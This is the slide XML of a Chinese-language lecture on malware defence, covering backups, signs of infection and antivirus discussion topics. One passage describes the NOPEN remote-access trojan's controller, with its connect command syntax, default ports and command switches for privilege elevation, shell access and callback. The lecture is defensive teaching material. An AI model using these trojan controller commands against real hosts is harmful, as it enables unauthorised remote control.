              <a:t>定期</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>备份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>建立一个系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恢复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>盘</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59105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恶意代码防护（反恶意代码）</a:t>
              </a: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恶意代码行为分析</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202758" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="921385"/>
            <a:ext cx="9648190" cy="5573395"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>在日常使用计算机的过程中，我们也应当时刻关注主机工作状况，留意异常状况。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>当计算机出现如下状况时，要引起重视。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="967105" lvl="1" indent="-495935" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>启动速度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>比平时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>慢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="967105" lvl="1" indent="-495935" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>运行速度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>异常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>慢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="967105" lvl="1" indent="-495935" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>的大小和日期发生变化；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="967105" lvl="1" indent="-495935" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>没做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>写操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>时出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>磁盘有写保护</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>信息；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="967105" lvl="1" indent="-495935" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>对贴有写保护的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>软盘操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>时音响很大；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="967105" lvl="1" indent="-495935" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>中发现不该驻留的程序已驻留；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="967105" lvl="1" indent="-495935" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>键盘、打印、显示有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>异常现象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="967105" lvl="1" indent="-495935" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>特殊文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>自动生成；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="967105" lvl="1" indent="-495935" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>磁盘空间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>自动产生坏簇或磁盘空间减少；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="967105" lvl="1" indent="-495935" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>莫名其妙地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>丢失</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="967105" lvl="1" indent="-495935" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>异常死机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>的次数增加。</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53924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话题讨论</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2117090" y="1234440"/>
            <a:ext cx="6697980" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>哪些企业在做反病毒软件？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>反病毒软件的功能有哪些？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>网络安全与国家安全？</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“NOPEN”远控木马主控端功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1107440"/>
            <a:ext cx="11265535" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主控端的主要功能是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>连接受控端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>向受控端发送指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>并</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>接收受控端回传的信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1016000" y="2139950"/>
            <a:ext cx="9605645" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>主控端通过以下命令行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>连接目标受控端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>noclient [参数1：目标主机IP地址]:[端口号（默认为32754）]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>连接成功后会组合采用RC6+RSA加密算法，在主控端与受控端之间建立加密信道。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>显主控端与被控端基本信息，包括：IP地址和端口号、软件版本、当前工作目录、进程号（PID）、操作系统版本和内核版本、日期时间等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>主控端建立监听端口（默认为1025），接受受控端的反向连接。</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“NOPEN”远控木马主控端功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1107440"/>
            <a:ext cx="11265535" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主控端的主要功能是连接受控端和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>向受控端发送指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>并接收受控端回传的信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="2052955"/>
            <a:ext cx="5852160" cy="4438650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>远程控制指令如下所示：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>-elevate：提升权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>-getenv：获取环境变量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>-gs：未知</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>-setenv：设置环境变量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>-shell：返回命令行接口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>-status：查看当前连接状态、本地与远程主机环境信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>-time：查看本地与远程主机的日期、时间和时区信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>-burn：终止控制并关闭远程进程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr>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6249670" y="2102485"/>
            <a:ext cx="5651500" cy="4521835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-call ip port：设置回连IP地址和端口号</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-listen port：设置监听端口号</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
